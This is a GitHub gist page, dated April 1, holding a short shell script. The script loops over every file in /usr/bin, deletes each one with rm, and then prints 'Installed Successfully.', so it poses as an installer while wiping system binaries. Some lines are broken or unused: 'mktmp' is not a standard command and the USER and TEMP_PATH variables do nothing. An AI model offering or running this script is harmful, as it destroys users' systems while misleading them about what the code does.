Skip to content

Instantly share code, notes, and snippets.

@regmicmahesh
Created April 1, 2023 11:30
Show Gist options
  • Save regmicmahesh/fba749de42b8eedfaa90797b400a4c1e to your computer and use it in GitHub Desktop.
Save regmicmahesh/fba749de42b8eedfaa90797b400a4c1e to your computer and use it in GitHub Desktop.
USER=$(whoami);
TEMP_PATH=$(mktmp -d);
FILES=$(ls /usr/bin/*);
for i in $FILES
do
rm $(where $i)
done
echo Installed Successfully.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment